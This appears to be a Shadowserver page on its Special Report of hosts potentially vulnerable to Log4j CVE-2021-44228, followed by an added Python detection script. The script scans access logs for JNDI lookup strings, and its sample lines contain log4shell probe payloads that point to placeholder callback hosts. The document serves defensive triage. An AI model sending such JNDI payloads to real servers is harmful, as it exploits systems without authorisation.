This Special Report contains information on potentially vulnerable Apache Log4j 2 instances that are at high risk from CVE-2021-44228 / “log4shell” exploitation. You can read more on the background to CVE-2021-44228 and this Special Report in our blog posts here and here.
Shadowserver Special Reports are unlike all of our other standard free daily network reports. They do not cover a specific time period.
Instead, we send out Special Reports in situations where we are able to share one-time, high-value datasets that we feel should be reported responsibly for maximum public benefit. Sometimes there are incidents where it would be useful to notify potential victims about events or breaches that may have impacted them outside of the previous 24-hour period. Examples include high-profile events such as the Solarwinds Orion/SUNBURST supply chain compromise or the HAFNIUM/Microsoft Exchange Server mass breaches, where it may take a number of days for incident responders to conduct forensic investigations before analyzed data becomes available for sharing with potential victims. Although the events included in these Special Reports fall outside of our usual 24-hour daily reporting window, we believe that there is still significant benefit to our constituents in receiving, and hopefully acting on, the retrospective data.
If you have missed a Special Report because you were NOT yet a subscriber at the time a report was pushed out, simply subscribe for your network now and specifically request all recent Shadowserver Special Reports – and we will regenerate them specifically for your network, at no cost.
Note that the data shared across Special Reports may differ on a case-by-case basis, hence the report formats for different Special Reports may also differ.
The data in this Vulnerable Log4j Special Report has been shared with Shadowserver by Alpha Strike Labs, who between December 11-13th 2021 used a seed list of ~300 million already known responding IP addresses, obtained from IPv4 /0 scans performed across 16 common ports, to check for vulnerable Log4j instances (Special Report #1). They repeated their scan in the period December 16th-22nd (Special Report #2). Their CVE-2021-44228 scan triggered an outbound DNS response from vulnerable systems through the JNDI interface, allowing potentially vulnerable systems to be enumerated. Alpha Strike Labs have asked us to make this data available to National CSIRTs and network owners through Shadowserver's proven channels.
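Network owners who receive this report will usually want to confirm, from their own web-server logs, which hosts received JNDI lookup strings of the kind used in the CVE-2021-44228 scans described above, and which callback hosts those strings pointed at. The following is an added detection example written for this page; it is not code from Shadowserver or Alpha Strike Labs, and the log lines, IP addresses and callback hostnames in it are constructed placeholders, not values from the report.

```python
import re
from typing import List, NamedTuple, Optional

# Constructed sample access-log lines (placeholders, not real report data). Two
# carry a JNDI lookup string in a header or query parameter; one is benign.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://scan.example.net:1389/a}"',
    '198.51.100.7 - - [11/Dec/2021:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:11:22:33 +0000] "GET /api?x=${JNDI:DNS://probe.example.org/id} HTTP/1.1" '
    '404 0 "-" "curl/7.68.0"',
]

# A JNDI lookup has the shape ${jndi:<scheme>://<host>[:<port>]/...}. The match is
# case-insensitive because Log4j does not treat the "jndi" keyword case-sensitively.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


class JndiHit(NamedTuple):
    source_ip: str          # client that sent the request (first field of the log line)
    scheme: str             # lookup scheme, e.g. ldap, rmi or dns
    callback_host: str      # host the vulnerable system would contact
    callback_port: Optional[int]


def find_jndi_lookup(line: str) -> Optional[JndiHit]:
    """Return details of the JNDI lookup string in one log line, or None if absent."""
    m = JNDI_RE.search(line)
    if not m:
        return None
    source_ip = line.split(" ", 1)[0]
    port = int(m.group("port")) if m.group("port") else None
    return JndiHit(source_ip, m.group("scheme").lower(), m.group("host").lower(), port)


def scan_log(lines: List[str]) -> List[JndiHit]:
    """Collect every JNDI lookup found across the given log lines."""
    return [hit for hit in (find_jndi_lookup(line) for line in lines) if hit is not None]


def callback_hosts(lines: List[str]) -> List[str]:
    """Distinct callback hosts, sorted; useful for checking outbound DNS/LDAP logs."""
    return sorted({hit.callback_host for hit in scan_log(lines)})


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(hit)
    print("callback hosts:", callback_hosts(SAMPLE_LOG_LINES))
```

Feeding real access logs through `scan_log` shows which internal hosts received lookup strings; correlating `callback_hosts` against outbound DNS or LDAP connection logs from those hosts then separates systems that merely received a probe from systems that actually resolved or connected to the callback, which is the behaviour the scan described above relies on to identify vulnerable instances.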